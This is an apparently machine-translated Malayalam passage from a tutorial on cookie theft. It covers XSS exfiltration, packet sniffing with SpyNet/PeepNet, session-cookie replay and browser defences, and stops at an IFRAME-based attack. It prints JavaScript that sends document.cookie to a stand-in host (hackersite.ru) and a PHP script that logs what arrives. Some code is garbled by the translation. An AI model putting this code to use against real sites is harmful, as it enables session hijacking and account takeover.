ഘട്ടം 6: ചില കുക്കികൾ മാറ്റാൻ, ഫയൽ C:\IE_ext.htm, മാറ്റിസ്ഥാപിക്കുക ടെസ്റ്റ് നാമംകുക്കി എന്ന പേരിൽ, പരിശോധന മൂല്യം- അതിന്റെ അർത്ഥത്തിൽ, testdomain.ru- സൈറ്റ് ഡൊമെയ്‌നിലേക്ക്. ആവശ്യമെങ്കിൽ, സമാനമായ കൂടുതൽ വരികൾ ചേർക്കുക. നിയന്ത്രണത്തിന്റെ എളുപ്പത്തിനായി, മാറ്റത്തിന് മുമ്പും ശേഷവും നിലവിലുള്ള കുക്കികളുടെ ഔട്ട്‌പുട്ട് ഞാൻ സ്‌ക്രിപ്റ്റിലേക്ക് ചേർത്തു: മുന്നറിയിപ്പ് (external.menuArguments.document.cookie);

സ്റ്റെപ്പ് 7: സ്റ്റെപ്പ് 5 വീണ്ടും ചെയ്യുക, തുടർന്ന് പേജ് പുതുക്കുക.

ചുവടെയുള്ള വരി: അപ്ഡേറ്റ് ചെയ്ത കുക്കികൾ ഉപയോഗിച്ച് ഞങ്ങൾ ഈ ഇന്റർനെറ്റ് റിസോഴ്സ് ആക്സസ് ചെയ്യും.

JavaScript ഉപയോഗിച്ച് കുക്കികൾ എങ്ങനെ മോഷ്ടിക്കാം?

ഇരയുടെ കമ്പ്യൂട്ടറിൽ ഒരു അനിയന്ത്രിതമായ JavaScript സ്ക്രിപ്റ്റ് എക്സിക്യൂട്ട് ചെയ്യാനുള്ള അവസരം ഒരു ആക്രമണകാരി കണ്ടെത്തുകയാണെങ്കിൽ, അയാൾക്ക് നിലവിലുള്ള കുക്കികൾ വളരെ എളുപ്പത്തിൽ വായിക്കാൻ കഴിയും. ഉദാഹരണം:


var str= document.cookie;

എന്നാൽ അവ തന്റെ സൈറ്റിലേക്ക് മാറ്റാൻ അദ്ദേഹത്തിന് കഴിയുമോ, കാരണം, ഞാൻ നേരത്തെ സൂചിപ്പിച്ചതുപോലെ, ഒരു JavaScript സ്ക്രിപ്റ്റിന് മറ്റൊരു ഡൊമെയ്നിൽ സ്ഥിതി ചെയ്യുന്ന ഒരു സൈറ്റ് അധിക സ്ഥിരീകരണമില്ലാതെ ആക്സസ് ചെയ്യാൻ കഴിയില്ലേ? ഒരു JavaScript സ്ക്രിപ്റ്റിന് ഏതെങ്കിലും http സെർവറിൽ സ്ഥിതി ചെയ്യുന്ന ഏത് ചിത്രവും ലോഡ് ചെയ്യാൻ കഴിയുമെന്ന് ഇത് മാറുന്നു. അതേ സമയം, ഡൗൺലോഡ് അഭ്യർത്ഥനയിലെ ഏതെങ്കിലും വാചക വിവരങ്ങൾ ഈ ചിത്രത്തിലേക്ക് മാറ്റുക. ഉദാഹരണം: http://hackersite.ru/xss.jpg?text_infoഅതിനാൽ നിങ്ങൾ ഈ കോഡ് പ്രവർത്തിപ്പിക്കുകയാണെങ്കിൽ:

var img= പുതിയ ചിത്രം();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


തുടർന്ന് "ചിത്രം" ഡൗൺലോഡ് ചെയ്യാനുള്ള അഭ്യർത്ഥനയിൽ കുക്കി അവസാനിക്കുകയും ആക്രമണകാരിയുടെ അടുത്തേക്ക് "പോകുകയും ചെയ്യും".

ഒരു "ചിത്രം" ഡൗൺലോഡ് ചെയ്യുന്നതിനുള്ള അത്തരം അഭ്യർത്ഥനകൾ എങ്ങനെ കൈകാര്യം ചെയ്യാം?

ഒരു ആക്രമണകാരിക്ക് PHP പിന്തുണയുള്ള ഒരു ഹോസ്റ്റിംഗ് കണ്ടെത്തുകയും അവിടെ ഇതുപോലെയുള്ള കോഡ് സ്ഥാപിക്കുകയും വേണം:

$uid=urldcode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose ($fp);
?>

അപ്പോൾ ഈ സ്ക്രിപ്റ്റിനായുള്ള എല്ലാ അഭ്യർത്ഥന പാരാമീറ്ററുകളും ഫയലിൽ സംരക്ഷിക്കപ്പെടും log.txt. മുമ്പ് വിവരിച്ച ജാവാസ്ക്രിപ്റ്റ് സ്ക്രിപ്റ്റ് മാറ്റിസ്ഥാപിക്കുക മാത്രമാണ് അവശേഷിക്കുന്നത് http://hackersite.ru/xss.jpgഈ php സ്ക്രിപ്റ്റിലേക്കുള്ള പാതയിലേക്ക്.


താഴത്തെ വരി

XSS കേടുപാടുകൾ മുതലെടുക്കാനുള്ള ഏറ്റവും ലളിതമായ മാർഗ്ഗം മാത്രമാണ് ഞാൻ കാണിച്ചത്. എന്നാൽ ഒരു മൾട്ടി-യൂസർ ഇൻറർനെറ്റ് സൈറ്റിലെ അത്തരം ഒരു അപകടസാധ്യതയെങ്കിലും നിങ്ങളുടെ പേരിൽ അതിന്റെ ഉറവിടങ്ങൾ ഉപയോഗിക്കാൻ ഒരു ആക്രമണകാരിയെ അനുവദിക്കുമെന്ന് ഇത് തെളിയിക്കുന്നു.

ചില വെബ്‌സൈറ്റുകൾ അവരുടെ സന്ദർശകരെ എങ്ങനെ വ്യക്തിഗതമാക്കുന്നുവെന്ന് നിങ്ങൾ എപ്പോഴെങ്കിലും ചിന്തിച്ചിട്ടുണ്ടോ? ഉദാഹരണത്തിന്, "കാർട്ടിന്റെ" (ഈ നോഡ് സാധനങ്ങൾ വിൽക്കാൻ ഉദ്ദേശിച്ചുള്ളതാണെങ്കിൽ) അല്ലെങ്കിൽ ഏതെങ്കിലും ഫോമിന്റെ ഫീൽഡുകൾ പൂരിപ്പിക്കുന്ന രീതിയിലുള്ള ഉള്ളടക്കം ഓർമ്മിക്കുന്നതിലൂടെ ഇത് പ്രകടിപ്പിക്കാം. വേൾഡ് വൈഡ് വെബിന്റെ പ്രവർത്തനത്തിന് അടിവരയിടുന്ന HTTP പ്രോട്ടോക്കോളിന് ഒരു സൈറ്റിലേക്കുള്ള ഒരു സന്ദർശനത്തിൽ നിന്ന് മറ്റൊന്നിലേക്കുള്ള ഇവന്റുകൾ ട്രാക്ക് ചെയ്യാനുള്ള മാർഗമില്ല, അതിനാൽ അത്തരം "സ്റ്റേറ്റുകൾ" സംഭരിക്കുന്നതിന് ഒരു പ്രത്യേക ആഡ്-ഓൺ വികസിപ്പിച്ചെടുത്തു. RFC 2109-ൽ വിവരിച്ചിരിക്കുന്ന ഈ സംവിധാനം, വെബ്‌സൈറ്റുകളെ അവരുടെ സന്ദർശകരെ ട്രാക്ക് ചെയ്യാൻ അനുവദിക്കുന്ന HTTP അഭ്യർത്ഥനകളിലേക്കും പ്രതികരണങ്ങളിലേക്കും കുക്കി ഡാറ്റയുടെ പ്രത്യേക ഭാഗങ്ങൾ ചേർക്കുന്നു.

ആശയവിനിമയ സെഷന്റെ സമയത്തേക്ക് കുക്കി ഡാറ്റ സംഭരിച്ചേക്കാം ( ഓരോ സെഷനും), ഒരു സെഷനിൽ RAM-ൽ ശേഷിക്കുകയും ബ്രൗസർ അടച്ചിരിക്കുമ്പോൾ അല്ലെങ്കിൽ ഒരു നിശ്ചിത കാലയളവ് കഴിഞ്ഞതിന് ശേഷവും ഇല്ലാതാക്കപ്പെടുകയും ചെയ്യുന്നു. മറ്റ് സന്ദർഭങ്ങളിൽ അവ ശാശ്വതമാണ് ( സ്ഥിരമായ), ഉപയോക്താവിന്റെ ഹാർഡ് ഡ്രൈവിൽ ഒരു ടെക്സ്റ്റ് ഫയലായി അവശേഷിക്കുന്നു. അവ സാധാരണയായി കുക്കീസ് ​​ഡയറക്‌ടറിയിൽ സംഭരിക്കുന്നു (%windir%\Cookies-ലെ Win9x, %userprofile%\Cookies- NT/2000). ഇന്റർനെറ്റിൽ കുക്കികൾ ക്യാപ്‌ചർ ചെയ്‌ത ശേഷം, ഒരു ആക്രമണകാരിക്ക് തന്നിരിക്കുന്ന കമ്പ്യൂട്ടറിന്റെ ഉപയോക്താവായി ആൾമാറാട്ടം നടത്താനോ അല്ലെങ്കിൽ ഈ ഫയലുകളിൽ അടങ്ങിയിരിക്കുന്ന പ്രധാനപ്പെട്ട വിവരങ്ങൾ ശേഖരിക്കാനോ കഴിയുമെന്ന് ഊഹിക്കാൻ പ്രയാസമില്ല. ഇനിപ്പറയുന്ന ഭാഗങ്ങൾ വായിച്ചതിനുശേഷം, ഇത് എത്ര എളുപ്പമാണെന്ന് നിങ്ങൾക്ക് മനസ്സിലാകും.

കുക്കി തടസ്സപ്പെടുത്തൽ

നെറ്റ്‌വർക്കിലൂടെ കൈമാറ്റം ചെയ്യപ്പെടുന്ന കുക്കികളെ തടസ്സപ്പെടുത്തുക എന്നതാണ് ഏറ്റവും നേരിട്ടുള്ള രീതി. ഉചിതമായ സെർവറിലേക്ക് ലോഗിൻ ചെയ്യുമ്പോൾ തടസ്സപ്പെട്ട ഡാറ്റ ഉപയോഗിക്കാനാകും. ഏത് പാക്കറ്റ് ഇന്റർസെപ്ഷൻ യൂട്ടിലിറ്റിയും ഉപയോഗിച്ച് ഈ പ്രശ്നം പരിഹരിക്കാൻ കഴിയും, എന്നാൽ ഏറ്റവും മികച്ച ഒന്നാണ് ലാവ്രെന്റി നികുലയുടെ പ്രോഗ്രാം ( ലോറന്റിയൂ നികുല) SpyNet/PeepNet. സ്‌പൈനെറ്റിൽ ഒരുമിച്ച് പ്രവർത്തിക്കുന്ന രണ്ട് യൂട്ടിലിറ്റികൾ ഉൾപ്പെടുന്നു. പ്രോഗ്രാം ക്യാപ്ചർനെറ്റ്പാക്കറ്റ് തന്നെ പിടിച്ചെടുക്കുകയും ഡിസ്കിൽ സൂക്ഷിക്കുകയും ചെയ്യുന്നു, പീപ്നെറ്റ് യൂട്ടിലിറ്റി ഫയൽ തുറന്ന് മനുഷ്യർക്ക് വായിക്കാവുന്ന ഫോർമാറ്റിലേക്ക് മാറ്റുന്നു. പീപ്നെറ്റ് പുനർനിർമ്മിച്ച ഒരു കമ്മ്യൂണിക്കേഷൻ സെഷന്റെ ഒരു ഭാഗമാണ് ഇനിപ്പറയുന്ന ഉദാഹരണം, ഈ സമയത്ത് കണ്ട പേജുകളിലേക്കുള്ള ആക്‌സസ് ആധികാരികമാക്കാനും നിയന്ത്രിക്കാനും കുക്കി സഹായിക്കുന്നു (അജ്ഞാതത്വം നിലനിർത്താൻ പേരുകൾ മാറ്റിയിരിക്കുന്നു).

http://www.victim.net/images/logo.gif HTTP/1.0 സ്വീകരിക്കുക: */* റഫറർ: http://www.victim.net/ ഹോസ്റ്റ്: www.victim.net കുക്കി: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

മുകളിലെ ഉദാഹരണം, സെർവറിലേക്ക് വരുന്ന ഒരു HTTP അഭ്യർത്ഥനയിൽ സ്ഥാപിച്ചിരിക്കുന്ന ഒരു കുക്കി ശകലം കാണിക്കുന്നു. ഏറ്റവും പ്രധാനപ്പെട്ടത് വയലാണ് cuid=, www.victim.net നോഡിൽ ഉപയോക്തൃ പ്രാമാണീകരണത്തിനായി ഉപയോഗിക്കുന്ന ഒരു അദ്വിതീയ ഐഡന്റിഫയർ വ്യക്തമാക്കുന്നു. ഇതിനുശേഷം, ആക്രമണകാരി ഇര.നെറ്റ് നോഡ് സന്ദർശിച്ചു, അവന്റെ സ്വന്തം ഐഡന്റിഫയറും ഒരു കുക്കിയും ലഭിച്ചു (നോഡ് കുക്കി ഡാറ്റ വെർച്വൽ മെമ്മറിയിൽ സ്ഥാപിക്കുന്നില്ലെന്ന് കരുതുക, പക്ഷേ അത് ഹാർഡ് ഡ്രൈവിലേക്ക് എഴുതുന്നു). ആക്രമണകാരിക്ക് സ്വന്തം കുക്കി തുറക്കാനും ക്യാപ്‌ചർ ചെയ്‌ത പാക്കറ്റിൽ നിന്ന് cuid= ഫീൽഡ് ഐഡി മാറ്റിസ്ഥാപിക്കാനും കഴിയും. ഈ സാഹചര്യത്തിൽ, visitd.net സെർവറിലേക്ക് ലോഗിൻ ചെയ്യുമ്പോൾ, കുക്കി ഡാറ്റ തടഞ്ഞുനിർത്തിയ ഉപയോക്താവായി അവൻ കാണപ്പെടും.

പ്രോഗ്രാം കഴിവ് പീപ്നെറ്റ്മുഴുവൻ ആശയവിനിമയ സെഷനും അല്ലെങ്കിൽ അതിന്റെ ശകലവും വീണ്ടും പ്ലേ ചെയ്യുന്നത് ഇത്തരത്തിലുള്ള ആക്രമണങ്ങൾ നടപ്പിലാക്കാൻ വളരെയധികം സഹായിക്കുന്നു. ഒരു ബട്ടൺ ഉപയോഗിച്ച് പോയി അത് എടുക്കൂ!ക്യാപ്ചർനെറ്റ് മുമ്പ് പിടിച്ചെടുത്ത അവരുടെ കുക്കി ഡാറ്റ ഉപയോഗിച്ച് ഒരു ഉപയോക്താവ് കണ്ട പേജുകൾ നിങ്ങൾക്ക് വീണ്ടും ലഭ്യമാക്കാം. പീപ്നെറ്റ് യൂട്ടിലിറ്റി ഡയലോഗ് ബോക്സിൽ ഒരാളുടെ പൂർത്തിയാക്കിയ ഓർഡറുകളെക്കുറിച്ചുള്ള വിവരങ്ങൾ നിങ്ങൾക്ക് കാണാൻ കഴിയും. ഇത് പ്രാമാണീകരണത്തിനായി CaptureNet തടസ്സപ്പെടുത്തിയ കുക്കി ഡാറ്റ ഉപയോഗിക്കുന്നു. സെഷൻ ഡാറ്റ ഡയലോഗ് ബോക്‌സിന്റെ താഴെ വലത് കോണിൽ സ്ഥിതിചെയ്യുന്ന ഫ്രെയിമും കുക്കി: ലൈൻ പിന്തുടരുന്ന വരിയും ശ്രദ്ധിക്കുക. ഇത് പ്രാമാണീകരണത്തിനായി ഉപയോഗിക്കുന്ന കുക്കി ഡാറ്റയാണ്.

ഇത് വളരെ വൃത്തിയുള്ള ഒരു തന്ത്രമാണ്. കൂടാതെ, യൂട്ടിലിറ്റി ക്യാപ്ചർനെറ്റ്നെറ്റ്‌വർക്ക് അസോസിയേറ്റ്‌സ്, ഇൻ‌കോർപ്പറേറ്റിന്റെ സ്നിഫർ പ്രോ പോലുള്ള പ്രൊഫഷണൽ-ഗ്രേഡ് യൂട്ടിലിറ്റികളുടെ കഴിവുകൾക്ക് ഏതാണ്ട് തുല്യമായ ട്രാഫിക്കിന്റെ പൂർണ്ണമായ ഡീക്രിപ്റ്റ് റെക്കോർഡ് നൽകാൻ കഴിയും. എന്നിരുന്നാലും, യൂട്ടിലിറ്റി സ്പൈനെറ്റ്ഇതിലും മികച്ചത് - നിങ്ങൾക്ക് ഇത് സൗജന്യമായി ലഭിക്കും!

പ്രതിരോധ നടപടികൾ

പ്രാമാണീകരണത്തിനും സെൻസിറ്റീവ് ഐഡന്റിഫിക്കേഷൻ വിവരങ്ങൾ സംഭരിക്കുന്നതിനും കുക്കികൾ ഉപയോഗിക്കുന്ന സൈറ്റുകളിൽ നിങ്ങൾ ജാഗ്രത പാലിക്കണം. Kookaburra Software's Cookie Pal ആണ് സുരക്ഷയെ സഹായിക്കുന്ന ഒരു ടൂൾ, അത് http://www.kburra.com/cpal.html എന്നതിൽ കാണാം. ഒരു വെബ്‌സൈറ്റ് കുക്കി മെക്കാനിസം ഉപയോഗിക്കാൻ ശ്രമിക്കുമ്പോൾ ഉപയോക്താവിന് മുന്നറിയിപ്പ് സന്ദേശങ്ങൾ സൃഷ്ടിക്കുന്നതിന് ഈ സോഫ്റ്റ്‌വെയർ ഉൽപ്പന്നം കോൺഫിഗർ ചെയ്യാവുന്നതാണ്. ഈ സാഹചര്യത്തിൽ, നിങ്ങൾക്ക് "തിരശ്ശീലയ്ക്ക് പിന്നിൽ നോക്കുക" കൂടാതെ ഈ പ്രവർത്തനങ്ങൾ അനുവദിക്കണമോ എന്ന് തീരുമാനിക്കാം. ഇന്റർനെറ്റ് എക്സ്പ്ലോററിന് ഒരു ബിൽറ്റ്-ഇൻ കുക്കി മെക്കാനിസം ഉണ്ട്. ഇത് പ്രവർത്തനക്ഷമമാക്കാൻ, നിയന്ത്രണ പാനലിൽ ഇന്റർനെറ്റ് ഓപ്‌ഷൻസ് ആപ്‌ലെറ്റ് സമാരംഭിക്കുക, സുരക്ഷാ ടാബിലേക്ക് പോകുക, ഇന്റർനെറ്റ് സോൺ ഇനം തിരഞ്ഞെടുക്കുക, ഇഷ്‌ടാനുസൃത ലെവൽ മോഡ് സജ്ജമാക്കുക, സ്ഥിരവും താൽക്കാലികവുമായ കുക്കി ഡാറ്റയ്‌ക്കായി, പ്രോംപ്റ്റിലേക്ക് സ്വിച്ച് സജ്ജമാക്കുക. നെറ്റ്‌സ്‌കേപ്പ് ബ്രൗസറിൽ കുക്കികളുടെ ഉപയോഗം സജ്ജീകരിക്കുന്നത് കമാൻഡ് ഉപയോഗിച്ചാണ് എഡിറ്റ് › മുൻഗണനകൾ › വിപുലമായത്ഒരു കുക്കി സ്വീകരിക്കുന്നതിന് മുമ്പ് മുന്നറിയിപ്പ് നൽകുക അല്ലെങ്കിൽ കുക്കി മോഡ് പ്രവർത്തനരഹിതമാക്കുക (ചിത്രം 16.3). നിങ്ങൾ ഒരു കുക്കി സ്വീകരിക്കുമ്പോൾ, അത് ഡിസ്കിൽ എഴുതിയിട്ടുണ്ടോ എന്ന് പരിശോധിക്കുകയും വെബ്‌സൈറ്റ് ഉപയോക്താക്കളെക്കുറിച്ചുള്ള വിവരങ്ങൾ ശേഖരിക്കുന്നുണ്ടോയെന്ന് പരിശോധിക്കുകയും വേണം.

പ്രാമാണീകരണത്തിനായി കുക്കികൾ ഉപയോഗിക്കുന്ന ഒരു സൈറ്റ് സന്ദർശിക്കുമ്പോൾ, നിങ്ങൾ ആദ്യം നൽകിയ ഉപയോക്തൃനാമവും പാസ്‌വേഡും കുറഞ്ഞത് SSL എൻക്രിപ്റ്റ് ചെയ്തിട്ടുണ്ടെന്ന് ഉറപ്പാക്കണം. അപ്പോൾ ഈ വിവരം പീപ്നെറ്റ് പ്രോഗ്രാം വിൻഡോയിൽ ദൃശ്യമാകും, കുറഞ്ഞത് പ്ലെയിൻ ടെക്സ്റ്റിന്റെ രൂപത്തിലല്ല.

പതിവായി സന്ദർശിക്കുന്ന പല വെബ്‌സൈറ്റുകൾക്കും ഈ ഓപ്ഷൻ ആവശ്യമില്ലെങ്കിൽ, കുക്കികൾ പൂർണ്ണമായും ഒഴിവാക്കാൻ രചയിതാക്കൾ താൽപ്പര്യപ്പെടുന്നു. ഉദാഹരണത്തിന്, Microsoft-ന്റെ ലോകമെമ്പാടുമുള്ള ജനപ്രിയ Hotmail സേവനത്തിന്, രജിസ്ട്രേഷനായി കുക്കികൾ ആവശ്യമാണ്. പ്രാമാണീകരണ പ്രക്രിയയിൽ ഈ സേവനം വിവിധ സെർവറുകൾ ഉപയോഗിക്കുന്നതിനാൽ, അവയെ വിശ്വസനീയ സൈറ്റുകളുടെ സോണിലേക്ക് ചേർക്കുന്നത് അത്ര എളുപ്പമല്ല (ഈ പ്രക്രിയ "സെക്യൂരിറ്റി സോണുകൾ വിവേകപൂർവ്വം ഉപയോഗിക്കുന്നത്: ആക്ടിവക്സ് നിയന്ത്രണ പ്രശ്നത്തിനുള്ള ഒരു പൊതു പരിഹാരം" എന്ന വിഭാഗത്തിൽ വിവരിച്ചിരിക്കുന്നു). ഈ സാഹചര്യത്തിൽ, *.hotmail.com എന്ന പദവി സഹായിക്കും. HTML പ്രോട്ടോക്കോൾ അപൂർണ്ണതയുടെ പ്രശ്നത്തിന് കുക്കികൾ ഒരു തികഞ്ഞ പരിഹാരമല്ല, എന്നാൽ ഇതര സമീപനങ്ങൾ ഇതിലും മോശമാണെന്ന് തോന്നുന്നു (ഉദാഹരണത്തിന്, URL-ലേക്ക് ഒരു ഐഡന്റിഫയർ ചേർക്കുന്നത്, അത് പ്രോക്സി സെർവറുകളിൽ സൂക്ഷിക്കാൻ കഴിയും). ഒരു മികച്ച ആശയം വരുന്നതുവരെ, മുകളിൽ ലിസ്റ്റുചെയ്തിരിക്കുന്ന രീതികൾ ഉപയോഗിച്ച് നിങ്ങളുടെ കുക്കികൾ നിയന്ത്രിക്കുക എന്നതാണ് നിങ്ങളുടെ ഒരേയൊരു ഓപ്ഷൻ.

URL വഴി കുക്കികൾ ക്യാപ്ചർ ചെയ്യുക

ഭയങ്കരമായ എന്തെങ്കിലും നമുക്ക് സങ്കൽപ്പിക്കാം: ഇന്റർനെറ്റ് എക്സ്പ്ലോറർ ഉപയോക്താക്കൾ പ്രത്യേകം തയ്യാറാക്കിയ ഹൈപ്പർലിങ്കുകളിൽ ക്ലിക്ക് ചെയ്യുകയും അവരുടെ കുക്കികൾ തടസ്സപ്പെടുത്തപ്പെടാൻ സാധ്യതയുള്ള ഇരകളാകുകയും ചെയ്യുന്നു. ബെന്നറ്റ് ഹാസൽട്ടൺ ( ബെന്നറ്റ് ഹാസൽട്ടൺ) ഒപ്പം ജാമി മക്കാർത്തി ( ജാമി മക്കാർത്തി) ഇന്റർനെറ്റ് വഴിയുള്ള ആശയവിനിമയ സ്വാതന്ത്ര്യത്തിനായി വാദിക്കുന്ന കൗമാര സംഘടനയായ പീസ്ഫയർ, ഈ ആശയത്തിന് ജീവൻ നൽകുന്ന ഒരു സ്ക്രിപ്റ്റ് പ്രസിദ്ധീകരിച്ചു. ഈ പേജിൽ അടങ്ങിയിരിക്കുന്ന ഒരു ലിങ്കിൽ ഉപയോക്താവ് ക്ലിക്കുചെയ്യുമ്പോൾ ഈ സ്ക്രിപ്റ്റ് ക്ലയന്റ് കമ്പ്യൂട്ടറിൽ നിന്ന് കുക്കികൾ വീണ്ടെടുക്കുന്നു. തൽഫലമായി, കുക്കിയിലെ ഉള്ളടക്കങ്ങൾ വെബ് സൈറ്റ് ഓപ്പറേറ്റർമാർക്ക് ലഭ്യമാകും.

ഒരു വെബ് പേജ്, HTML ഇമെയിൽ അല്ലെങ്കിൽ ന്യൂസ് ഗ്രൂപ്പ് പോസ്‌റ്റ് എന്നിവയുടെ HTML-ൽ IFRAME ടാഗുകൾ ഉൾച്ചേർത്ത് ഈ സവിശേഷത ദുഷിച്ച ഉദ്ദേശ്യങ്ങൾക്കായി പ്രയോജനപ്പെടുത്താം. സുരക്ഷാ ഉപദേഷ്ടാവ് റിച്ചാർഡ് എം. സ്മിത്ത് നൽകിയ ഇനിപ്പറയുന്ന ഉദാഹരണം, പീസ്ഫയർ വികസിപ്പിച്ച ഒരു യൂട്ടിലിറ്റി ഉപയോഗിച്ച് IFRAME ഹാൻഡിലുകൾ ഉപയോഗിക്കാനുള്ള കഴിവ് തെളിയിക്കുന്നു.